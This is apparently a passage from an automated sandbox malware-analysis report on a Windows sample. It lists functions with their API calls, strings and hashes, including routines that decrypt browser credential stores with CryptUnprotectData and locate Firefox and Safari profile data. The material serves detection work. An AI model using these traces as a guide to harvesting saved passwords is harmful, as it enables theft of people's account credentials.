                                                                                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                  Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                  • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                  • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4218492932-0
                                                                                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                  Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EmptyClipboard.USER32 ref: 00409882
                                                                                                                  • wcslen.MSVCRT ref: 0040988F
                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                  • CloseClipboard.USER32 ref: 004098D7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1213725291-0
                                                                                                                  • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                  • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                  Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7626DF80,?,0041755F,?), ref: 00417452
                                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                  Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1865533344-0
                                                                                                                  • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                  • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                  • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                  • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                  Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4255912815-0
                                                                                                                  • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                  • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                  • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                  • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                  Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                                                  • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                  • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                  • API String ID: 2929817778-1134094380
                                                                                                                  • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                  • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                  Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                  • String ID: :stringdata$ftp://$http://$https://
                                                                                                                  • API String ID: 2787044678-1921111777
                                                                                                                  • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                  • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                  Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                                  • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                  • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                  Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                  • memset.MSVCRT ref: 00413292
                                                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                                                  • memset.MSVCRT ref: 00413310
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                  • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                  Strings
                                                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                  • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                  • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                  Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 829165378-0
                                                                                                                  • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                  • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                  Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                                  • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                  • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                  Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                  • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                  • API String ID: 4054529287-3175352466
                                                                                                                  • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                  • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                  Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                  • API String ID: 3143752011-1996832678
                                                                                                                  • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                  • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                  • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                  • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                  Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
